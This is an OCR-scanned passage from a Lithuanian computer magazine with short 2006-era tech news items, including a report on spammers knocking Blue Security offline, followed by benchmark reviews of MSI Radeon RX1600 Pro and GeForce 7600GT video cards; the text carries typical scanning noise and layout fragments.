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Kas galėtų yti tokią sistemą? Ar jo 
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SENSORINIS CTX MONITORIUS 


Jeigu tau atsibodo derinti savo monitorių, nuolat maigyti apačioje 
arba šone esančius mygtukus, 0 programinio konfigūravimo jis 
nepripažįsta, įsižiūrėk į kompanijos CTX naujus SK ekranų mod- 
elius, kurie turi sensorinį valdymą, iš esmės palengvinantį darbą 
su jais. Tokiomis galimybėmis gali pasipuikuoti du 17 colių mo- 
deliai: PV711T irPV711BT. Šie įrenginiai turi penkialaidį rezistyvinį 
taktilinį daviklį, kuris išsiskiria darbo stabilumu ir ilgu veikimo laiku, 
leidžia duomenis įvesti pieštuku 
(stylus), nagu, kreditine kortele, 
pirštu arba ranka su pirštine, 0 
tvirtas besisukinėjantis pagrindas 
užtikrina patogų Garbą. Techninės 
įrenginio charakteristikos tokios: 
skiriamoji geba — 1280x1024, 
kontrastingumas — 500:1, 
ryškumas — 300 kd/m “ 2, prie 
kompiuterio monitoriai jungiami 
per D-Sub arba USB. Įrenginio 
kaina — šiek tiek daugiau 600 dolerių, 
jį jau pradėta pardavinėti. 


NAUJAS ULTRAPLONAS „SAM- 
SUNG“ MOBILUSIS TELEFONAS 


Atrodytų, kaip galima gaminti dar mažesnius telefonus ir tuo pačiu 
juose idiegti naujus papildomas funkcijas? Greičiausiai kompanija 
„Samsung“ tai puikiai žino, kadangi neseniai Rusijoje vykusioje 
parodoje („Sviaz-Ekspokomm 2006“) ji pristatė patį ploniausią pa- 
saulyje mobilųjį telefoną SGH-X820. Naujovės korpuso storis siekia 
viso labo 6,9 milimetro. Kiti parametrai: ilgis 113 milimetrų, 
plotis — 50 milimetrų, svoris — 66 gramai. Beje, pasiekti tokį 
mažą svorį pavyko naudojant tvirtą korpusą iš plastmasės su 
stiklo pluoštu. Nepaisant tokių kuklių gabaritų ir mažo svorio, tel- 
efono galimybės nudžiugins kiekvieną. Jame rasi 2 megapikselių 
fotoaparatą su galimybe įrašyti MPEG-4 ir H.263 standarto 
vaizdą. Nenuostabu, kad įmontuota telefono atmintis pakankamai 
didelė — 80 megabaitų. Ekranėlio 
įstrižainė — 1,9 colio, skiriamoji 
geba — 176 « 220 taškų, jame 
galima atvaizduoti 262 tūkstančius 
spalvų. Telefonas supranta MP3, 
AAC, ACC+, AAC+(e) ir WMA by- 
las, gali peržiūrėti dokumentus bei 
turi Bluetooth, USB ir PictBridge 
sąsajas. SGH-X820 taip pat turi ir 
vaizdo išėjimą. Mobilusis telefonas 
gali pasigirti ir interneto galimybėmis 
(GPRS). Kaip sako kompanijos spe- 
cialistai, tankus telefono elementų 
sumontavimas -— naujos montavimo 
technologijos „Protingas paviršius“ 
(Smart Surface Maunting Technology 

SSMT) nuopelnas. Viskas čia labai 
gerai, gąsdina tik viena — kaina, kuri 
kol kas dar nepaskelbta. 


VASARINĖ MUZIKA 


Kompanija „Cowon“ žada dar vasarą išleisti įdomią naujovę 
grotuvą iAudio6, kurio širdis yra 4 Gb talpos kompanijos „Toshiba' 
pagamintas 0,85" mikrodiskas. Įrenginio gabaritai labai kompaktiški 
(76,1535,6x19 mm, svoris — 60 g), tačiau jis turi daug galimybių: tai 
vaizdo (XVID MPEG--4), garso (MP3, WMA, 0GG, ASF, FLAC, WAV), 
tekstinių (TXT) ir grafinių bylų (JPEG) atkūrimas. Beje, visa tai 
galima peržiūrėti 1,3 colio SK ekranėlyje. Iš papildomų galimybių 
galima paminėti diktofoną (su tiesioginiu įrašu ko- 

davimu į MP3 formata), radiją ir daugiafunkcinį 
sensorinį valdymo skydelį, kuris leidžia atkurti 
įrašus, persukinėti dainas ir reguliuoti garsą. 
Prie kompiuterio įrenginys jungiamas per USB 
2.0 sąsają, grotuvas taip pat leidžia atnau- 
jinti įmontuotą programinę įrangą. Beje, 
deklaruojamas pilnai pakrauto akumulia- 
toriaus darbo laikas siekia 20 valandų. Šis 
nuostabus daikčiukas jau turėtų pasirodyti 
parduotuvių lentynose. 


NANOVAMZDELIŲ MASYVAS IŠ 
TIESŲ PRIMENA „UŽSEGTUKĄ“ 


Pasirodo, įprastinės termopastos šilumą iš akmens į radiatorių 
perduoda ne taip gerai, kaip to noretysi naują procesorių kartą 
kuriantiems inžinieriams. Taigi pradėta ieškoti termopastos 
pakaitalo. Ir štai, kaip nesenai nustatė mokslininkai, anglies 
nanovamzdeliai gali tapti efektyviu šilumos perdavėju ir net 
išsklaidytoju. Taigi Timotis Fišeris (Timothy S. Fisher) ir jo 
kolegos iš Purdue universiteto sugebėjo išsklaidančio radiato- 
riaus paviršių padengti nanovamzdelių kilimu, taip pagreitinę 
šilumos perdavimą tarp radiatoriaus ir aušinančio paviršiaus. 
Iš anglies nanovamzdelių gautas nanokilimas savo savybėmis 
buvo panašus į įprastinį klijuojama „užsegtuką“ (tas daiktas, 
kurį siuva ant rūbų vietoje sagų bei užtrauktukų, kur vienoje 
pusėje yra kilpelės, o kitoje — kabliukai), todėl kūrėjai ji pa- 
vadino Thermal Velcro. Pradinis tyrinėtojų tikslas buvo sukurti 
naujus šilumos perdavėjų tipus, kurie užtikrintų greitesnį šilumos 
perdavimą iš mikroschemų į aušinantį radiatorių. Timotis ir jo 
komanda naująją medžiagą pavadino „užsegtuku“ (Velcro), ka- 
dangi iš pradžių mikroschema ir radiatorius padengiami plonu 
nanovamzdelių kilimu, o po to abi dalys sujungiamos taip, lyg 
užsegtum limpantį „užsegtuką“. Savaime suprantama, tokia 
termosąsaja neužtikrina mechaninio dviejų paviršių sukibimo, 
tačiau dėl nanovamzdelių tarpusavio kontakto ji yra geras šilumos 
perdaviklis. Kaip nustatė mokslininkai, mikroschemos šyla ne 
tik viduje, bet ir kontakto su termopasta vietose, kurios nespėja 
pilnai perduoti šilumos į radiatorių. Taigi naudojant tradicines 
termosąsajas mikroschemos paviršius papildomai įkaista 15“C, 
0su nanovamzdelių „užsegtuku“ papildomas mikroprocesoriaus 
įkaitimas siekia viso labo 5“C. Kadangi ateityje mikroschemų 
gabaritai mažės, atitinkamai jų įkaitimas didės, todėl net ir keli 
laipsniai bus svarbu bei turės įtakos įrenginio darbingumui. 
Termosąsajos technologija jau paruošta komerciniam platinimui, 
o tyrime dalyvavusios kompanijos ketina netrukus pradėti tiekti 
serijinę Thermal Velcro naudojančią produkciją 
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ASUS VEJASI FIZIKĄ 


Norėdama palengvinti centrinio procesoriaus apkrovimą ir suteikti 
žaidimams naujų galimybių, kompanija ASUS išleido plokštę PhysX 
P1 su Ągeia PhysX mikroschema, kuri yra fizinis spartintuvas: Su 
ja mes žaidimuose pamatysime realistiškus sprogimu vaizdus, 
teisingą, pagal visus fizikos dėsnius skriejančių nuolaužų skrydį, 
tikrą vandens tekėjimą, natūralius kietų kūnų susidūrimus bei 
tai, kaip vėjas išsklaido tirštą dūmų arba rūko šydą. O centrinis 
procesorius gali visiškai atsidėti dirbtinio intelekto ir žaidimo logikos 
apdorojimui. Žodžiu, tikras grožis! Plokštė veikia su 128 

Mb GDDR-3 atminties, jos magistralės plotis 
siekia 128 bitus, o dažnis 733 MHz. 
Derėtų pastebėti, kad šios plokštės 
jau pasirodė prekyboje. Jau ku- 
riami darbui su jomis 

skirti žaidimai. Taip 

pat derėtų pastebėti 

vieną įdomų dalyką, 

kad NVIDIA ruošiasi išleisti 
panašų sprendimą. 


KRĖSLAS TANKISTAMS 


Jeigu tu vaikystėje norėjai būti tankistu, tai Tank Chair krėslas 
skirtas kaip tik tau! Geniali ir paprasta idėja — prie paprasčiausios 
kėdės primontuoti tikrus tanko vikšrus. Ją įgyvendinęs JAV pilietis 
Kulybinas gavo universal nginį tiek mėgėjams pasivažinėti, tiek 
ir invalidams. Su šiuo monstru galima keliauti per purvą, sniegą, 
smėlį, įveikti nedidelius griovius ir net leistis bei kilti laiptais! Šis 
stebuklas išlaiko 120 kilogramų sveriantį keleivį. Jau pagaminta 
Ir parduota apie 10 tokių mašinų, o Kulybinas įkūrė kompaniją 
TankChair, kuri ir užsiima tolimesniu kėdžių-tankų platinimu. 


Kėdę priverčiantys judėti motorai paimti iš kovinių „NPC Robot- 
cs“ kompanijos gaminamų robotų. Kėdę-tanką galima užsisakyti 
adresų www.tankchair.com. Kaip sako pats Kulybinas, vieną kėdę 
jis padovanojo reabilitacinei paralyžiuotųjų ligoninei, po ko ten 
greitai susidarė eilute norinčiųjų pasivažinėti. Manau, kad ir tu 
būtum visai nieko prieš išbandyti šį įrenginį :). 


ACME NAUJIENOS 


Acme pristato vis daugiau ir daugiau naujų produktų, kurie 
savo kokybe beveik nenusileidžia rinkos veteranams, tačiau 
mus džiugina kur kas mažesne kaina. Šio mėnesio karštose 
naujienose — trys maži prietaisai iš Acme 
media. Visų pirma, Acme pristato mobilios 
muzikos dozę šiai vasarai. Net 512 MB 
vidinės atminties už 119 Lt?! Panašu, 
jog tai tiesa — A93 modelis be visa 
ko turi ir diktofono funkciją, gerą 
dizainą ir aukštos kokybės garsą. Šis 
grotuvas turi ir dar vieną dovanėlę 
— dviguba jungtis leidžia dviems 
žmonėms vienu metu klausytis tos 
pačios muzikėlės. Čia gali pasitarnauti ir 
naujos Acme ausinės, kurios, tiesa, 
skirtos daugiau bendravimui 
internetinėmis telefono pa- 
slaugomis nei muzikos klausy- 
muisi, tačiau Aczme CD-890MV ausinės geba susidoroti 
ir su vienomis, ir su kitomis užduotimis 
Specialus korpusas talpina net 
50 mm skersmens garsiaka- 
" Ibius, todėl garso kokybė tikrai 
negali būti prasta. Dar vienas itin 
geras dalykas (kas, tiesa, dažnai 
koją pakiša daugumai ausinių) 
ilgas laidas. Acme parūpina net 


2,2 metro ilgumo laidą, todėl galima jaus 

tis kiek patogiau, jeigu norisi nenusiėmus 

ausinių nukeliauti iki šalia kompiuterio esančios 
gražiausių šio 


sofos. Be abejo, kaina vienas 
prietaiso niuansų — vos 
42 Lt. Na ir, žinoma, 
trečiasis mūsų pasirink- 
tas Acmemedia (inter- 
nete galima rasti didesnį 
prekių pasirinkimą, 
adresu www.acme- 
media.lt) produktas 
— internetinė kam- 
era. Papildymas ką 
tik paminėtoms 
ausinėms, jeigu norisi 
kalbėtis internetu ne 
tik nemokamai, tačiau 
dar ir su kalbančiojo atvaizdu 
ekrane. 54 Lt kainuojanti TO71 internetinė kamera 
turi įmontuotą mikrofoną bei aukštos raiškos 
VGA CMOS sensorių, kuris skaitmeninio 
vaizdo didinimo pagalba vaizdą išdidina 
iki 640x480 rezoliucijos. USB 1.1 
jungti naudojanti internetinė 
kamerytė beveik niekuo 
nenusileidžia daugumai savo 
konkurentų, tačiau kainuoja 
kur kas mažiau. 


[= 


06 


38] 


[HAKERIS 40: 


8] 


[HAKERIS 4407 [38] 06 


HACKNEWS A 


HITECHNEWS A 


KOREJIETE KIBERDRAUGĖ 


Galbūt tu jau girdėjai apie įvairius bandymus pakeisti gražiąją 
lyti į kibernetinę draugę. Taigi mūsų planetoje pasirodė antra 
moteris-androidė. Pirmąją japonai pristatė 2003 metais. Antroji 
kiberdraugė Pietų Korėjos industrinių technologijų instituto 
(Korea Institute of Industrial Technology — KITECH) tvarinys. 
Antrasis pasaulyje androidas buvo pavadintas EveR-1. Pirmoji 
pavadinimo pusė — tai levos vardas (Eve), o raidė R reiškia žodį 
robot“. Ši draugė kūrėjams kainavo 3000 dolerių. Ji sėkmingai 
apsimeta 20 metų natūralaus dydžio korėjiete: jos ūgis — 1,6 
metro, svoris — apie 50 kilogramų. Yra vienas niuansas: mer- 
gina-androidė negali judėti, kadangi apatinė jos kūno dalis 
prikaustyta prie kėdės. Tiesa, ji gali judinti viršutinę kūno dalį 
Ir rankas, padedama 15 mažų varikliukų demonstruoti keturias 
svarbias veido išraiškas (džiaugsmą, pykti, liūdesi ir nustebimą), 
„suprasti“ 400 žodžių, užmegzti „akis į akį“ kontaktą ir, matyt, 
dar kai ką. Šių metų pabaigoje KITECH žada parodyti EveR-2, 
kuri galės stovėti bei bus ištobulinusi „regą“ ir emocijų reiškimą. 
Tikimasi, kad EveR tipo mašinos galės būti gidais: dalins 
informaciją parduotuvėse, muziejuose Ir linksmins vaikučius. 


ŠOKĄ SUKELIANTIS PEILIS — 
PAVOJINGA PRAMOGA 


Pamiršk įprastinius elektros šoko prietaisus! Dabar madinga visai 
kas kita — peilis, kuris skaudžiai trenkia elektra. Šį malonumą Ka- 
nados kompanija „Shocknife“ siūlo už viso labo 444 JAV dolerius. 
Shocknife atrodo kaip peilis, sveria maždaug tiek pat, tačiau negali 
rimtai traumuoti. O jo ašmenų ilgis — 28 centimetrai. Nuo kitų peilių 
artimos kovos treniruotėse jį skiria viena svarbi naujovė: visas Shoc: 
knife „ašmenų“ kraštas (tiek apačia, tiek ir viršus) tai vientisas 
elektros šokas, kontakto metu galintis išlaisvinti 7,5 tūkstančių voltų 
galią (ant rankenos yra akiwavimo mygtukas). Šio prietaiso autoriai 
mano, kad Shocknife peilis treniruojantis kovos menus bus kur kas 
efektyvesnis už tokiais atvejais įprastinius medinius arba guminius 
peilius, kadangi praleidus smūgį Shocknife ginančiam sukelia dideli 
skausmą, taip priversdamas jį iš tiesų stengtis. Be to, šis peilis 
aiškiai „Iokalizuoja“ smūgio tašką, leisdamas analizuoti savo kovos 
technikos klaidas. Taip pal jis besitreniruojančiam leidžia jausti net 
ir nedidelius „įpjovimus“. Kad elektros šokas atsitiktinai nesužeistų 
tavęs ar tavo draugo, ant peilio yra specialus 4 padėčių galios 
reguliatorius. Iš esmės šis elektrinis peilis gali būti naudojamas ir 
kaip savigynos ginklas, tačiau kanadiečiai visų pirma tikisi policijos, 
armijos, specialiųjų pajėgų ir kovos menų klubų dėmesio, kadangi 
jie Shocknife laiko idealiu treniruočių įrankiu. 


AKIS UŽ AKĮ 


Šiais laikais su spameriais geriau nejuokauti. Pavyzdžiu tapo „Blue 
Security“ (amerikiečių firma, besispecializuojanti Kompiuterių 
saugume) nuotykis. Neseniai vaikinai iš BS sugalvojo būdą, 
kuris, jų manymu, galėtų pažaboti spamerišką blogį. Šio būdo 
pavadinimas — Blue Frog. Iš tiesų tai paprastutė programa, kuri 
vartotojo pašte ieško spamo pranešimų, juose suranda nuorodas į 
besireklamuojančias svetaines ir po to vartotojo vardu šių resursų 
savininkams išsiunčia skundus. Gavę eilinį tūkstantį tokių skundų, 
spamerių klientai šimtąjį kartą pagalvos prieš užsisakydami tokias 
paslaugas. „Blue Security“ nusprendė vaizdžiai pademonstruoti 
savo programos efektyvumą ir spam bendruomenės atstovams 
išsiuntė krūvas žinučių. Ar verta sakyti, kad pastariesiems tai visiškai 
nepatiko, todėl atsakymo ilgai laukti nereikėjo. Spamerių mafija 
ant BS užsiuntė dešimtis tūkstančių kompiuterių-z0mbių Ir mirtinai 
užDoSino vergšę firmelę. Svetainė užsilenkė. Be to, spameriai į 
firmos elektroninio pašto dėžutę atsiuntė perspėjimą šiek tiek 
atvėsti, priešingu atveju kitomis aukomis taps „Blue Security“ 
klientai. Skundų siuntimas spamerių adresais buvo sustabdytas, 
tačiau „saugumiečiai“ visko taip paprastai nepaliko ir kreipėsi į 
FTB. Dabar vyksta aiškinimaisi, tačiau, tiesą sakant, labai abejoju, 
kad federalai čia padės. 


ŠTAI JIS — NETURTINGIESIEMS 
SKIRTAS NEŠIOJAMASIS KOM- 
PIUTERIS 


Nešiojamasis kompiuteris 
visada reikalingas daik- 
tas, tik jam ne visada gali- 
ma skirti apvalią pinigų 
sumelę. Įsivaizduok, kaip 
jaučiasi kinai ir indai, kurie 
turi dar mažiau pinigų, nei 
mes? O juk jiems taip pat 
reikia dirbti! Būtent tokiu tikslu . 
kompanija „Intel“ galų gale 
oficialiai pristatė nebrangų į 
besivystančias šalis orientuotą 
nešiojamąjį kompiuterį. „Intel“ 
supratimu prieinamumas — tai 400 
dolerių, už kuriuos vartotojai gauna tegu ir 
galingą, tačiau kuo puikiausiai veikiantį nešiojamąjį Komoiuterį. 
Naujojo įrenginio kodinis pavadinimas — Eduwise. Kol kas žinoma 
nedaug detalių: operacinė sistema bus Windows arba Linux, į 
Internetą bus išeinama per Wi-Fi kanalą. „Intel“ manymu, kor 
pusas-rankinė su rankena ir užsegimu turėtų patikti dėstytojams 
ir studentams. Juk ši naujovė ir skirta būtent išsilavinimui plėtoti. 
Naujasis nešiojamasis kompiuteris dar įpylė žibalo į kompanijų 
kovą už masinį trečiojo pasaulio šalių kompiuterizavimą. Visai 
neseniai generalinis „Intel“ direktorius Kreigas Baretas kritikavo 
100 dolerių kainuojančio nešiojamojo kompiuterio projekta, kuriuo 
užsiiminėja Nikolas Negropontė iš Masačūsetso technologijos insti- 
tuto daugialypės terpės laboratorijos (MIT Media Lab). Kaip žada 
„Intel“, pigų Eduwise kompiuterį bus galima įsigyti kitais metais. 


nelabai 


HITECHNEWS A 


HITECHNEWS A 


DU BRANDUOLIAI VIENAM 
NESIOJAMAJAM KOMPIUTERYJE 


Galingas nešiojamasis kompiuteris jau seniai nėra kažkas mistiško. 
Šiandien kompanija MSI pristato mobilios galios įsikūnijimą 
— įrenginį S271 su AMD Turion 64 X2 Dual Core procesoriumi. Be 
to, Jis turi 12 colių ekraną (1280x800 taškų, kraštinių santykis — 
16:10), jame įdiegta grafinė mikroschema ATI Radeon Xpress200, 
512 arba 1024 Mb RAM bei 120 Gb talpos kietasis diskas (disko 
sukimosi greitis 5400 aps/min). Negalima nepaminėti tokių 
belaidžių įrenginių, kaip Wi-Fi b/g ir BlueTooth 2.0. Kompiuteryje 
taip pat įdiegtas Garbo patogumą padidinantis sensorinis manipulia- 
torius Butterfly Touchpad, įrenginys gali pasipuikuoti dinaminio CPU 
(procesoriaus) ir GPU 
(grafinės posistemės) 
spartinimo technologija 
bei energijos taupymo 
sistema. Melomanai 
įvertins į S271 įdiegtą 
erdvinio garso audio 
sistemą. Įrenginio 
korpusas pagamin- 
tas iš aliuminio ir 
magnio lydinio, jo 
storis 2 cm, 0 svoris 
nesiekia 2 kg. 


LINKSYS“ 


A Division of Cisco Systems, Inc. 


„KODAK“ SPAMINA 
SAVO KLIENTUS 


Niekam ne paslaptis, kad daugelis stambių kompanijų užsiima 
spameriška veikla. Neseniai paaiškėjo, kad viena iš tokių firmų 
yra „Kodak“, kuri prieš pusantrų metų savo svetainės lankyto- 
jams išsiuntė 2 milijonus nepageidaujamų pranešimų. Kompani 
jai buvo pateiktas kolektyvinis ieškinys. Visas šis reikalas į prieki 
judėjo gana lėtai ir baigėsi tuo, kad „Kodak“ pripažino savo kaltę 
ir yra pasiruošusi išmokėti 26 tūkstančių dolerių dydžio baudą. 
Pasak kompanijos atstovų, visa tai įvyko dėl techninio sutrikimo. 
Dabar problema pataisyta Ir incidentas daugiau nepasikartos. 
Tiesa, „Kodak“ 
nepatikslino, kas 
tai per sutrikimas. 
Jungtinėse Val- 
stijose į komercinį 
spamą dabar 
žiūrima ypatingai 
griežtai: pranešime 
turi būti žymė apie 
reklaminį laiško 
pobūdį, atgalinis 
adresas ir galimybė 
atsisakyti tokių 
pranešimų. 


FERRUM 


SCENA HACK IMPLANT SOFTW 


UNIXOID 


CODING 


UNITS 


010 


MSI vaizdo 


MSI RX1600 Pro 


Pirmas žvilgsnis 

Dežutės apiforminimas praktiškai 
atitinka vyresnį modelį, MSI 
RX1600XT. Nebent nebėra 
rankenos pernešimui, o užrašai 
atspindi RX1600 Pro charak- 
teristikas. 


kortų testavimas 


KOMPANIJA MSI SENIAI IR SĖKMINGAI 
GAMINA VAIZDO KORTAS, TODĖL NĖRA 
NIEKO STEBĖTINO, KAD BŪTENT JOS 
GAMYBOS PRODUKTAI RINKOJE AT- 
SIRANDA VIENI PIRMŲJŲ. ŠĮ KARTĄ 
APŽVELGSIME RYŠKIAUSIUS VIDUTINĖS 
KLASĖS ATSTOVUS. 


Aksesuarų rinkinys palieka 
malonų įspūdį. Komplekte yra 
dvi brošiūros - vartotojo in- 
strukcija ir greito instaliavimo 
vadovas bei DVD su žaidimu 
„Colin McRae Rally 2005“ 
ir kompaktinė plokštelė su 
tvarkyklėmis ir programomis, 
tarp kurių: 


„VGA Driver" 

„MSI Live Update“ 
„MSI GoodMEM" 
„MSI LockBox" 
„MSI WMlnfo" 
„MSI SecureDoc" 
„E-Color" 
„MediaRing“ 
„ShowShift“ 
„AdobemAcrobatmReader“ 
„DirextX Drivers" 
„Nortonm2005“ 
„ThinSoft Be Twin“ 


Daugelį taikomųjų programų 
galima greičiau pavadinti 
sisteminėmis, negu skirtomis 
vaizdui. Trumpą paaiškinimą 
prie kiekvieną jų galima surasti 
gamintojo interneto svetainėje, 
iš kur įmanoma atsisiųsti ir 
pačias programas. 


Korta komplektuojama šiais 
kabeliais: 


HDTV-out adapteris 
TV-out (composite + S-Video) 
adapteris 


Kaip matote, vaizdo korta yra 
pakankamai kuklių išmatavimų. 
MSI kompanijos panaudotas 
aušintuvas užima gan didelę 
plokštės dalį ir atrodo įspūdingai. 
Nepaisant jo gelsvos spalvos, 
pagamintas jis ne iš vario, O 
iš kažkokio lydinio su danga. 
Dėl savo dydžio ir nedidelio 
sukimosi greičio ventiliatorius 
praktiškai neskleidžia jokio 
triukšmo. Briaunoti kyšuliai Iš 
viršaus ir dešinės skirti atminties 
lustams aušinti, tačiau mūsų 
atveju tai veikiau duoklė madai, 
negu efektyvus vaizdo atminties 
aušinimas. 


Irštai kodėl. Kitoje kortos pusėje 
yra dar 4 vaizdo atminties 
lustai, ir jie nėra uždengti joki 
ais radiatoriais. Aišku, kad tik 
pusės atminties lustų aušinimas 
vargu ar pagelbės sėkmingam 
užturbinimui. Nepaisant to, 
eksperimentų mėgėjams visada 
išlieka galimi Žaisti su savų 
radiatorių klijavimu į atmintį. 


Vaizdo procesorius pagamin 
tas anų metų 45-14 savaitę Ir 
išdidžiai vadinasi RV530Pro. 
Nominalus darbo dažnis tiksliai 
atitinka rekomenduotiną -— 500 
MHz. 


Viso kortoje yra įtaisyti 8 al- 
minties lustai, po 4 kiekvienoje 
pusėje, suminė apimtis — 256 
Mb. Lustai „Infineon“ gamybos, 
atmintis DDR2 tipo, testuo: 
jamoje vaizdo kortoje darbo 
dažnis sudaro 780 MHz, tai 
šiek tiek skiriasi nuo gamintojo 
rekomenduotinų 800 Hz DDR 


Užturbinimas 


Grafinį branduolį pavyko 
užturbinti iki 600 MHz dažnio, 
kuriuo jis stabiliai veikė viso 
testavimo eigoje. Atminčiai 
užturbinti didelių vilčių neb: 
uvo. Visų pirma, naudojama 
„Infineon“ atmintis niekada 
nepasižymėdavo polinkiu 
užturbinimams, skirtingai nuo 
tos pačios „Samsung“. Antra, 
radiatorių nebuvimas apatinėje 
plokštės pusėje yra dar vienas 
rimtas ribojantis faktorius. Re- 
zultate atmintį pavyko užturbinti 
iš nominalių 780 MHz iki 850 
MHz. Tai nėra daug, bet ką 
bepadarysi 


Testinių platformų konfigūracija 


Magistralė: PCI-E 

CPU: „AMD Athlon64 4000+* 
Sisteminė plokštė: „GIGABYTE 
K8NXP-SLI“ 

Atmintis: „Kingston HyperX 
PC3200“* 2x512 Mb 
OS: WinXP + SP2 
9.00 

PSU: Hiper 525W 


+ DirectX 


„ATI 


Testavimams buvo naudojamos „NVIDIA 81.95 WHOL“ ir 
CATALYST 5.12" versijų tvarkyklės. 


Testavimų rezultatai 


Peržiūros patogumui RX1600Pro rezultatai pažymėti oranžine 
spalva. 


3DMark 2005 Pro ver 120 -1024x768 


530065 


X1600xT 


HES XB00GTO 


pasea Pro a Eaonsa 


*1608 Pro 


x13M0Pro 


Nežymus pranašumas 
prieš 6600GT ir toks 
pat atsilikimas nuo 
RX1600XT greičiausiai 
kalba apie tai, kad 
„3DMarkO5“ parodymai 
vaizdo kortų gamintojų 
yra naudojami produk- 
tams pozicionuoti pagal 
segmentus. 


O štai čia RX1600Pro jau atsilieka nuo 6600GT. Ir užturbinimas 
nepadeda. Veikiausiai, „kalta“ lieta atmintis. Tačiau su 6600DDR2 
RX1600Pro tvarkosi nesunkiai. 


Half.life2 d1. canals. 09 Adnews02 4AAA6AF 1024x768 


1608 Pro 


x1amPTO 


Taip, realybė viską sudėlioja į savo vietas. Nepaisant aukštesnio 
taktinio dažnio ir 12 pikselinių blokų, RX1600Pro pralaimi 
6600DDR2. Tačiau atsilikimas nėra kritinis ir užturbinimas leic 
jį padengti. 


Half.ife2 d1 canals. 09 Adnaws2 4AA/16AF 1280x1024 


XrsoexT 


po Pro G 600160 


| 
| 5604 D0R2 
| 
| X1600 Pro 

x1000P10 


čiau nepamirši kad 
4AA/16AF. 


FPS yra ant komfortiško žaidimo ribos, 
kortos buvo testuojamos labai sudėtingu režimu 


Nalf.ife2 d1 canals. 09 Idnews02 4AA/16AF 1600x1200 


Situacija iš esmės nesikeičia. Aišku, su didžiausiais nt mais 
patogiai žaisti jau nepavyks, tačiau galima tvirtai teigti, kad pa 
prastesniuose grafiniuose režimuose ir su tokia skinamaja geba 
galima išvysti priimtiną FPS. 


Išvada 


Svarbiausia išvada, kurią šiandien norisi padaryti — „Radeon 
RX1600Pro“ visai pateisina savo kainą. Ir tuo pat metu leidžia 
patogiai žaisti šiuolaikinius žaidimus su maksimaliais nustatymais. 
Naujos technologijos, tokios, kaip AVIVO, gali tapti dar vienu 
papildomu pliusu šiai nebrangiai pagal savo galimybes vaizdo 
kortai. Esame tikri, kad „Radeon RX1600Pro“ būtinai atras savo 
pirkėją, nors dėl „naujumo efekto“ iš pradžių jo kaina gali L 
kiek didoka. 
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G73 


Šių metų kovo 9 diena kartu su topinių grafinių procesorių atnau- 
Jinimu NVIDIA pristatė naują lustą, kuriuo pagrindu bus žamina- 
mos vidutinio kainų segmento vaizdo kortos. Jo vardas yra G73. 
Tai visiškai naujas lustas, pagamintas pagal 90 nm technologinį 
procesą. Svarbiausi pakeitimai, palyginus su ankstesniu NV43 
(6600 serija) — 12 pikselinių ir 5 viršūniniai konvejeriai, vietoj 8 ir 
3 atitinkamai. Be to, G73 turi dvi vaizdo išvestis „DVI Dual-Link“ su 
maksimalia skiriamąja geba iki 2560x1600 imtinai, aparatinį HDTV 
ir H.264 pagreitinimą. Žinoma, G73 pripažįsta „Ultra Shadow II 
technologiją“ ir darbą SLI režimu. Apie šio lusto pagrindu pagamintų 
vaizdo kortų charakteristikas mes pakalbėsime vėliau, kuomet 
susipažinsime su ryškesniu jų atstovu. Taigi pasitikite. 


MSI NX7600GT 


Pirmas žvilgsnis 


BMSI 


Dėžutės apiforminimas kaip 
visada spalvingas. Užrašas 
„7600 Series“ liudija, kad 
analogiškas dizainas bus nau- 
dojamas ir 7600GT, ir 7600GS 
kortoms, kurios buvo anonsuo- 


tos visai neseniai. 


Kitoje dėžutės pusėje mes galime 


rasti informacijos apie tinkančias 
technologijas ir sisteminius reika- 
lavimus kompiuteriui, į kurį plan- 


uojama įstatyti vaizdo kortą. Iš 
svarbiausių reikalavimų verta 
pabrėžti gero maitinimo bloko 
būtinybę, kurio galingumas turėtų 
būti ne mažesnis kaip 350W, 0 
užtikrinama srovė pagal 12V liniją 
— ne mažesnė kaip 20. 


Aksesuarų rinkinys pakankamai 
kuklus, kaip ir dera vidutinės 
klasės produktui: 


Vartotojo instrukcija 

Greito instaliavimo vadovas 

Du DVI/D-SUB adapteriai 
HDTV-out kabelis 

S-Video kabelis 

Kompaktinė plokštelė su kortos 
tvarkyklėmis ir taikomosiomis 
programomis 

DVD su programomis, skirtomis 
darbui su video — „PowerCin- 
ema“ ir „Power2G0“ 

„Prince of Persia: The Two 
Thrones“ žaidimas 


Imam kortą į rankas 


Pati vaizdo korta atrodo labai 
jau kukliai. Jeigu ne spalv- 
ingas firminis lipdukas su 
MSI logotipu ir NX7600GT 
užrašu, galima būtų pagal- 
voti, kad prieš mus — dviejų 
metų senumo vidutiniokas. 
Mažas ventiliatorius skirtas 
tik vaizdo procesoriui aušinti, 
atminties |ustų — iš viso 
4, bet ir jie visiškai pliki, be 
Jokių radiatorių. Tačiau nepai- 
sant tariamo kuklumo, korta 
7600GT toli gražu nėra tokia 
paprasta, kaip gali pasirodyti. 
Bet apie viską iš eilės. 


Kita vaizdo kortos pusė įdomi 
tuo, kad joje nėra dar 4 vaizdo 
atminties lustų, kaip galima 
buvo laukti, nes dėžutėje yra 
parašyta, kad korta turi 256 
DDR3 tipo vaizdo atminties. 
Taip pat nėra ir video užgrobimo 
lusto, nors spausdintinės 
piokštės dizainas ir numato jo 
įdiegimą. 


Aušintuvas atrodo visai pa- 
prastai. Tai tiesiog vario plokštelė 
su prilituota „armonika“, kuri 


sudaro aušinimo briaunas. Ven 
tiliatoriaus išmatavimai nedideli, 
tačiau jų visai užtenka patiki- 
mam vaizdo lusto aušinimui 
nominaliu režimu. nors yra 
didelių abejonių, ar jis leis 
užtikrinti kokį nors užturbinimą. 


Nepaisant padidinto funkcinių 
blokų skaičiaus, grafinio 
procesoriaus G73 branduo- 
lio dydis praktiškai identiškas 
NV43 branduoliui, kuris yra 
įrengiamas 6600 serijos kortose 
— pasireiškia tobulesnis tech- 
nologinis procesas. Būtent jis 
taip pat leido pakelti grafinio lus- 
to dažnį, palyginus su 6600GT. 
Įrengtas šioje vaizdo kortoje 
Justas yra 2 revizijos ir išleistas 
pačią pirmąją šių metų savaite. 
Vaizdo procesoriaus nominalus 
darbo dažnis yra lygus 560 MHz. 
O štai su atmintimi viskas kur 
kas įdomiau! 


Jau matėme. kad korta turi iš 
viso 4 atminties lustus, bendra 
apimtimi 256 Mb. Tokio triuko 
paslaptis paprasta. Tai GDDR3 
tipo atmintis, „Samsung“ gamy- 
bos, 512Mbtt. Todėl keturiu lustų 
visai pakanka norint surinkti viso 
256 Mb. Beje, šios atminties 
naudojimas žymiai palengvina 
gamybos procesą ir, atitinka- 
mai, jo savikainą. O štai šios 
atminties dažnis tiesiog stulbina 
